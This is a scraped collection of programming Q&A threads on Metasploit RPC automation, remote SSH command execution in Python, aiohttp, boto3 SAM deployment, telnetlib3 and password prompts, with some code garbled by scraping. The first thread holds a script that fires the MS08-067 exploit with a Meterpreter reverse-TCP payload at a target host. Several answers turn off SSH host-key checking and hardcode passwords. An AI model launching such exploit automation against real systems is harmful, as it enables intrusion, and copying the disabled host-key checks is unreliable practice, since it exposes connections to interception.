How to automate Metasploit? - metasploit

I'm using the following code to automate Metasploit:
import os, msfrpc, optparse, sys, subprocess
from time import sleep
def sploiter(RHOST, LHOST, LPORT, session):
client = msfrpc.Msfrpc({})
client.login('msf', '123')
ress ='console.create')
console_id = ress['id']
commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
print "[+] Exploiting MS08-067 on: "+RHOST'console.write',[console_id,commands])
res ='',[console_id])
result = res['data'].split('\n')
But it's not working and I'm getting the error:'console.write',[console_id,commands])
NameError: name 'client' is not defined
What is the problem? Is there any other script that could work in a similar way?

Your indentation is off. So is performed outside the context where you create it inside the sploiter function.

Your client only exists inside your sploiter method.
Im not that familiar with python but I think you could adjust the sploiter method so that it returns the client.
client = msfrpc.Msfrpc({})
client.login('msf', '123')
return client
In the part below you could do something like
client = sploiter(Parameter1, Parameter2, Parameter3, Parameter4)'console.write',[console_id,commands])


Trying to convert this bash line to Python 2.6 [duplicate]

I'm writing a script to automate some command line commands in Python. At the moment, I'm doing calls like this:
cmd = "some unix command"
retcode =,shell=True)
However, I need to run some commands on a remote machine. Manually, I would log in using ssh and then run the commands. How would I automate this in Python? I need to log in with a (known) password to the remote machine, so I can't just use cmd = ssh user#remotehost, I'm wondering if there's a module I should be using?
I will refer you to paramiko
see this question
ssh = paramiko.SSHClient()
ssh.connect(server, username=username, password=password)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd_to_execute)
If you are using ssh keys, do:
k = paramiko.RSAKey.from_private_key_file(keyfilename)
# OR k = paramiko.DSSKey.from_private_key_file(keyfilename)
ssh.connect(hostname=host, username=user, pkey=k)
Keep it simple. No libraries required.
import subprocess
# Python 2
subprocess.Popen("ssh {user}#{host} {cmd}".format(user=user, host=host, cmd='ls -l'), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
# Python 3
subprocess.Popen(f"ssh {user}#{host} {cmd}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
Or you can just use commands.getstatusoutput:
commands.getstatusoutput("ssh machine 1 'your script'")
I used it extensively and it works great.
In Python 2.6+, use subprocess.check_output.
I found paramiko to be a bit too low-level, and Fabric not especially well-suited to being used as a library, so I put together my own library called spur that uses paramiko to implement a slightly nicer interface:
import spur
shell = spur.SshShell(hostname="localhost", username="bob", password="password1")
result =["echo", "-n", "hello"])
print result.output # prints hello
If you need to run inside a shell:["sh", "-c", "echo -n hello"])
All have already stated (recommended) using paramiko and I am just sharing a python code (API one may say) that will allow you to execute multiple commands in one go.
to execute commands on different node use : Commands().run_cmd(host_ip, list_of_commands)
You will see one TODO, which I have kept to stop the execution if any of the commands fails to execute, I don't know how to do it. please share your knowledge
import os
import sys
import select
import paramiko
import time
class Commands:
def __init__(self, retry_time=0):
self.retry_time = retry_time
def run_cmd(self, host_ip, cmd_list):
i = 0
while True:
# print("Trying to connect to %s (%i/%i)" % (, i, self.retry_time))
ssh = paramiko.SSHClient()
except paramiko.AuthenticationException:
print("Authentication failed when connecting to %s" % host_ip)
print("Could not SSH to %s, waiting for it to start" % host_ip)
i += 1
# If we could not connect within time limit
if i >= self.retry_time:
print("Could not connect to %s. Giving up" % host_ip)
# After connection is successful
# Send the command
for command in cmd_list:
# print command
print "> " + command
# execute commands
stdin, stdout, stderr = ssh.exec_command(command)
# TODO() : if an error is thrown, stop further rules and revert back changes
# Wait for the command to terminate
while not
# Only print data if there is data to read in the channel
rl, wl, xl =[ ], [ ], [ ], 0.0)
if len(rl) > 0:
tmp =
output = tmp.decode()
print output
# Close SSH connection
def main(args=None):
if args is None:
print "arguments expected"
# args = {'<ip_address>', <list_of_commands>}
mytest = Commands()
mytest.run_cmd(host_ip=args[0], cmd_list=args[1])
if __name__ == "__main__":
paramiko finally worked for me after adding additional line, which is really important one (line 3):
import paramiko
p = paramiko.SSHClient()
p.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # This script doesn't work for me unless this line is added!
p.connect("server", port=22, username="username", password="password")
stdin, stdout, stderr = p.exec_command("your command")
opt = stdout.readlines()
opt = "".join(opt)
Make sure that paramiko package is installed.
Original source of the solution: Source
The accepted answer didn't work for me, here's what I used instead:
import paramiko
import os
ssh = paramiko.SSHClient()
# ssh.load_system_host_keys()
ssh.connect("d.d.d.d", username="user", password="pass", port=22222)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("ls -alrt")
exit_code = # handles async exit error
for line in ssh_stdout:
total 44
-rw-r--r--. 1 root root 129 Dec 28 2013 .tcshrc
-rw-r--r--. 1 root root 100 Dec 28 2013 .cshrc
-rw-r--r--. 1 root root 176 Dec 28 2013 .bashrc
Alternatively, you can use sshpass:
import subprocess
cmd = """ sshpass -p "myPas$" ssh user#d.d.d.d -p 22222 'my command; exit' """
print( subprocess.getoutput(cmd) )
Just make sure to connect manually at least one time to the remote system via ssh (ssh root#ip) and accept the public key, this is many times the reason from not being able connect using paramiko or other automated ssh scripts.
I have used paramiko a bunch (nice) and pxssh (also nice). I would recommend either. They work a little differently but have a relatively large overlap in usage.
First: I'm surprised that no one has mentioned fabric yet.
Second: For exactly those requirements you describe I've implemented an own python module named jk_simpleexec. It's purpose: Making running commands easy.
Let me explain a little bit about it for you.
The 'executing a command locally' problem
My python module jk_simpleexec provides a function named runCmd(..) that can execute a shell (!) command locally or remotely. This is very simple. Here is an example for local execution of a command:
import jk_simpleexec
cmdResult = jk_simpleexec.runCmd(None, "cd / ; ls -la")
NOTE: Be aware that the returned data is trimmed automatically by default to remove excessive empty lines from STDOUT and STDERR. (Of course this behavior can be deactivated, but for the purpose you've in mind exactly that behavior is what you will want.)
The 'processing the result' problem
What you will receive is an object that contains the return code, STDOUT and STDERR. Therefore it's very easy to process the result.
And this is what you want to do as the command you execute might exist and is launched but might fail in doing what it is intended to do. In the most simple case where you're not interested in STDOUT and STDERR your code will likely look something like this:
cmdResult.raiseExceptionOnError("Something went wrong!", bDumpStatusOnError=True)
For debugging purposes you want to output the result to STDOUT at some time, so for this you can do just this:
If you would want to process STDOUT it's simple as well. Example:
for line in cmdResult.stdOutLines:
The 'executing a command remotely' problem
Now of course we might want to execute this command remotely on another system. For this we can use the same function runCmd(..) in exactly the same way but we need to specify a fabric connection object first. This can be done like this:
from fabric import Connection
REMOTE_HOST = "myhost"
REMOTE_LOGIN = "mylogin"
c = Connection(host=REMOTE_HOST, user=REMOTE_LOGIN, port=REMOTE_PORT, connect_kwargs={"password": REMOTE_PASSWORD})
cmdResult = jk_simpleexec.runCmd(c, "cd / ; ls -la")
# ... process the result stored in cmdResult ...
Everything remains exactly the same, but this time we run this command on another host. This is intended: I wanted to have a uniform API where there are no modifications required in the software if you at some time decide to move from the local host to another host.
The password input problem
Now of course there is the password problem. This has been mentioned above by some users: We might want to ask the user executing this python code for a password.
For this problem I have created an own module quite some time ago. jk_pwdinput. The difference to regular password input is that jk_pwdinput will output some stars instead of just printing nothing. So for every password character you type you will see a star. This way it's more easy for you to enter a password.
Here is the code:
import jk_pwdinput
# ... define other 'constants' such as REMOTE_LOGIN, REMOTE_HOST ...
REMOTE_PASSWORD = jk_pwdinput.readpwd("Password for " + REMOTE_LOGIN + "#" + REMOTE_HOST + ": ")
(For completeness: If readpwd(..) returned None the user canceled the password input with Ctrl+C. In a real world scenario you might want to act on this appropriately.)
Full example
Here is a full example:
import jk_simpleexec
import jk_pwdinput
from fabric import Connection
REMOTE_HOST = "myhost"
REMOTE_LOGIN = "mylogin"
REMOTE_PASSWORD = jk_pwdinput.readpwd("Password for " + REMOTE_LOGIN + "#" + REMOTE_HOST + ": ")
c = Connection(host=REMOTE_HOST, user=REMOTE_LOGIN, port=REMOTE_PORT, connect_kwargs={"password": REMOTE_PASSWORD})
cmdResult = jk_simpleexec.runCmd(
c = c,
command = "cd / ; ls -la"
cmdResult.raiseExceptionOnError("Something went wrong!", bDumpStatusOnError=True)
Final notes
So we have the full set:
Executing a command,
executing that command remotely via the same API,
creating the connection in an easy and secure way with password input.
The code above solves the problem quite well for me (and hopefully for you as well). And everything is open source: Fabric is BSD-2-Clause, and my own modules are provided under Apache-2.
Modules used:
fabric :
jk_pwdinput :
jk_simplexec :
Happy coding! ;-)
Works Perfectly...
import paramiko
import time
ssh = paramiko.SSHClient()
ssh.connect('', port=22, username='admin', password='')
stdin, stdout, stderr = ssh.exec_command(" ")
def execute():
stdin.write('xcommand SystemUnit Boot Action: Restart\n')
You can use any of these commands, this will help you to give a password also.
cmd =["sshpass -p 'password' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ps | grep minicom"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
cmd = subprocess.getoutput("sshpass -p 'password' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ps | grep minicom")
Have a look at spurplus, a wrapper we developed around spur that provides type annotations and some minor gimmicks (reconnecting SFTP, md5 etc.):
Asking User to enter the command as per the device they are logging in.
The below code is validated by
import paramiko
import xlrd
import time
ssh = paramiko.SSHClient()
loc = ('/Users/harshgow/Documents/PYTHON_WORK/labcred.xlsx')
wo = xlrd.open_workbook(loc)
sheet = wo.sheet_by_index(0)
Host = sheet.cell_value(0, 1)
Port = int(sheet.cell_value(3, 1))
User = sheet.cell_value(1, 1)
Pass = sheet.cell_value(2, 1)
def details(Host, Port, User, Pass):
ssh.connect(Host, Port, User, Pass)
print('connected to ip ', Host)
stdin, stdout, stderr = ssh.exec_command("")
x = input('Enter the command:')
details(Host, Port, User, Pass)
#Reading the Host,username,password,port from excel file
import paramiko
import xlrd
ssh = paramiko.SSHClient()
loc = ('/Users/harshgow/Documents/PYTHON_WORK/labcred.xlsx')
wo = xlrd.open_workbook(loc)
sheet = wo.sheet_by_index(0)
Host = sheet.cell_value(0,1)
Port = int(sheet.cell_value(3,1))
User = sheet.cell_value(1,1)
Pass = sheet.cell_value(2,1)
def details(Host,Port,User,Pass):
ssh.connect(Host, Port, User, Pass)
print('connected to ip ',Host)
stdin, stdout, stderr = ssh.exec_command("")
stdin.write('xcommand SystemUnit Boot Action: Restart\n')
The most modern approach is probably to use fabric. This module allows you to set up an SSH connection and then run commands and get their results over the connection object.
Here's a simple example:
from fabric import Connection
with Connection("your_hostname") as connection:
result ="uname -s", hide=True)
msg = "Ran {0.command!r} on {}, got stdout:\n{0.stdout}"
I wrote a simple class to run commands on remote over native ssh, using the subprocess module:
from ssh_utils import SshClient
client = SshClient(user='username', remote='remote_host', key='path/to/key.pem')
# run a list of commands
client.cmd(['mkdir ~/testdir', 'ls -la', 'echo done!'])
# copy files/dirs
client.scp('my_file.txt', '~/testdir')
Class source code
import subprocess
from pathlib import Path
from typing import Union
class SshClient():
""" Perform commands and copy files on ssh using subprocess
and native ssh client (OpenSSH).
def __init__(self,
user: str,
remote: str,
key_path: Union[str, Path]) -> None:
user (str): username for the remote
remote (str): remote host IP/DNS
key_path (str or pathlib.Path): path to .pem file
self.user = user
self.remote = remote
self.key_path = str(key_path)
def cmd(self,
cmds: list[str],
strict_host_key_checking=False) -> None:
"""runs commands consecutively, ensuring success of each
after calling the next command.
cmds (list[str]): list of commands to run.
strict_host_key_checking (bool, optional): Defaults to True.
strict_host_key_checking = 'yes' if strict_host_key_checking \
else 'no'
cmd = ' && '.join(cmds)
'-i', self.key_path,
'-o', f'StrictHostKeyChecking={strict_host_key_checking}',
'-o', 'UserKnownHostsFile=/dev/null',
def scp(self, source: Union[str, Path], destination: Union[str, Path]):
"""Copies `srouce` file to remote `destination` using the
native `scp` command.
source (Union[str, Path]): Source file path.
destination (Union[str, Path]): Destination path on remote.
'-i', self.key_path,
Below example, incase if you want user inputs for hostname,username,password and port no.
import paramiko
ssh = paramiko.SSHClient()
def details():
Host = input("Enter the Hostname: ")
Port = input("Enter the Port: ")
User = input("Enter the Username: ")
Pass = input("Enter the Password: ")
ssh.connect(Host, Port, User, Pass, timeout=2)
stdin, stdout, stderr = ssh.exec_command("")
stdin.write('xcommand SystemUnit Boot Action: Restart\n')

How do I avoid the loop argument

The following code is part of some automated tests that I have written in python 3.6:
connected = False
def aiohttp_server(loop):
async def handler(msg, session):
global connected
if msg.type == sockjs.MSG_OPEN:
connected = True
if msg.type == sockjs.MSG_CLOSE:
connected = False
app = web.Application(loop=loop)
sockjs.add_endpoint(app, handler)
runner = web.AppRunner(app)
return runner
def run_server(runner, loop):
format='%(asctime)s %(levelname)s %(message)s')
site = web.TCPSite(runner, 'localhost', 8080)
def start_server():
loop = asyncio.new_event_loop()
t = threading.Thread(target=run_server, args=(aiohttp_server(loop),loop,), daemon=True)
Basically, calling start_server should initiate a simple web server with a sockjs endpoint named /sockjs
I am not yet a master of python's async keyword. There are two issues, that I suspect are related:
Firstly, I am getting a deprecation warning on the app = web.Application(loop=loop) statement:
/home/peter/incubator/sockjs_client/tests/ DeprecationWarning: loop argument is deprecated
app = web.Application(loop=loop)
/home/peter/.local/lib/python3.6/site-packages/sockjs/ DeprecationWarning: loop property is deprecated
manager = SessionManager(name, app, handler, app.loop)
And secondly, the tests fail occasionally. I believe that, depending on machine load, sometimes the server hasn't had enough time to start before the test code actually starts executing.
Basically, what I need is for the start_server function to initialise a web application with a websocket endpoint, and not return until the application is prepared to accept websocket connections.
Firstly, I am getting a deprecation warning on the app = web.Application(loop=loop) statement:
The recommended way to avoid passing around the loop everywhere is to switch to Instead of managing the loop manually, let create (and close) the loop for you. If all your work is done in coroutines, you can access the loop with get_event_loop() or get_running_loop().
Basically, what I need is for the start_server function to initialise a web application with a websocket endpoint, and not return until the application is prepared to accept websocket connections.
You can pass a threading.Event to the thread that gets set when the site is set up, and wait for it in the main thread.
Here is an (untested) example that implements both suggestions:
connected = False
def aiohttp_server():
async def handler(msg, session):
global connected
if msg.type == sockjs.MSG_OPEN:
connected = True
if msg.type == sockjs.MSG_CLOSE:
connected = False
app = web.Application()
sockjs.add_endpoint(app, handler)
return web.AppRunner(app)
async def run_server(ready):
format='%(asctime)s %(levelname)s %(message)s')
runner = aiohttp_server()
await runner.setup()
site = web.TCPSite(runner, 'localhost', 8080)
await site.start()
# emulates loop.run_forever()
await asyncio.get_running_loop().create_future()
def start_server():
ready = threading.Event()
threading.Thread(, args=(aiohttp_server(ready),),
Please upgrade sockjs to the newest version.
It doesn't require passing the loop anymore.

How to deploy SAM template using boto3

I am trying to deploy
using boto3 library function create_stack but getting an error
"CreateStack cannot be used with templates containing Transforms"
How can I deploy this stack with boto3?
The comment is correct, you have to first create a change set and then execute the change set after change set creation is complete. Code outline is given below
client = boto3.client('cloudformation')
# Helper function to retrieve change set status
def changeSetStatus(change_set_name, client):
response = client.describe_change_set(
return response['Status']
# Create change set
cs_response = client.create_change_set(
ChangeSetName=stackname + "-cs"
#Remove print statements, here for illustration
change_set_name = cs_response['Id']
# Wait until change set status is CREATE_COMPLETE
while True:
response = change_set_status(change_set_name, client)
if response == 'CREATE_COMPLETE':
# Execute change set
ex_response = client.execute_change_set(
I think you should use Waiter instead of while loop like below;
from pprint import pprint
client = boto3.client('cloudformation')
change_set_name = stack_name + "-cs"
# Create change set
cs_response = client.create_change_set(
waiter = client.get_waiter('change_set_create_complete')
'Delay': 3,
'MaxAttempts': 50
desc_response = client.describe_change_set(
print("describe_change_set response Changes:")
pprint(desc_response["Changes"], indent=4)
exec_response = client.execute_change_set(
print("execute_change_set Changes:")
pprint(execute_change_set, indent=4)
My work below would be helpful;

how to run a remote command with telnetlib3 on python asyncio

I'm trying to write a simple telnet client that just runs a single command on a remote box using telnet. This needs to run over asyncio as other tasks are monitored at the same time under that framework.
I got it almost working, with the code below, that I tweaked from telnet-client as part of the telnetlib3 library; except that it does not return. I've had a hard time trying to figure what this protocol.waiter_closed is all about.
In any case, how do I need to tweak this code so that it returns once the command has been dealt with on the remote end ?
#!/usr/bin/env python3
import logging
import asyncio
import telnetlib3
# just to check that connection is thrown away
class MyClient(telnetlib3.TelnetClient):
def connection_lost(self, *args):
print("connection lost on client {} - args={}".format(self, args))
def register_telnet_command(loop, Client, host, port, command):
transport, protocol = yield from loop.create_connection(Client, host, port)
print("{} async connection OK for command {}".format(host, command))
def send_command():
EOF = chr(4)
EOL = '\n'
# adding newline and end-of-file for this simple example
command_line = command + EOL + EOF
# one shot invokation of the command
# what does this do exactly ?
yield from protocol.waiter_closed
port = 23
hostname = "fit01"
def main():
def ClientFactory():
return MyClient(encoding='utf-8', shell = telnetlib3.TerminalShell)
# create as many clients as we have hosts
loop = asyncio.get_event_loop()
register_telnet_command(loop, log, ClientFactory,
host = hostname, port = port,
command = "id"))
return 0
Sorry, my mistake, redefining close_connection without calling the code from telnetlib3.connection_lost is a bad idea, since this is the code that populates waiter_closed.
I should have done
class MyClient(telnetlib3.TelnetClient):
def connection_lost(self, *args):
print("connection lost on client {} - args={}".format(self, args))

WebSphere wsadmin jython - prompting for password

I am looking for a way to prompt for password (that is, no input echo).
I am using jython in WebSphere's wsadmin.
I've looked for it - it appears to be possible with import getpass or import termios (but I get "no module named ..." exception).
Any way to prompt for password anyway?
Thank you.
You can use the following code. It basically uses Java's console() if present (note that console may not be present all the time) else use raw_input() and password masking logic.
# if console is not available (ex: when invoked from a shell script or another java process)
# we need to fall back to use raw_input, but we should mask the password if we use it
import sys, thread, time, threading
from java.lang import String
def getPass(stream=None):
console = java.lang.System.console()
if console is None:
global p_stopMasking
if not stream:
stream = sys.stderr
p_stopMasking = 0
password = raw_input()
p_stopMasking = 1
except Exception, e:
p_stopMasking = 1
print "Error Occured"
print e
password = console.readPassword()
return String.valueOf(password)
def _doMasking(stream):
while not p_stopMasking:
def populateCredentials():
global username
global password
print 'Enter username:'
username = raw_input();
print 'Enter password:'
password = getPass(sys.stdout);
# start main
print 'start program...'
p_stopMasking= 1
username = None
password = None
print 'username is : ' + username
print 'password is : ' + password
The following also worked for me:
myPass = raw_input("Please enter a password: ")
This isn't perfect because it doesn't mask the password, but it does work. For some reason, if you don't specify the first "raw_input" invocation then the script won't block on the second one.
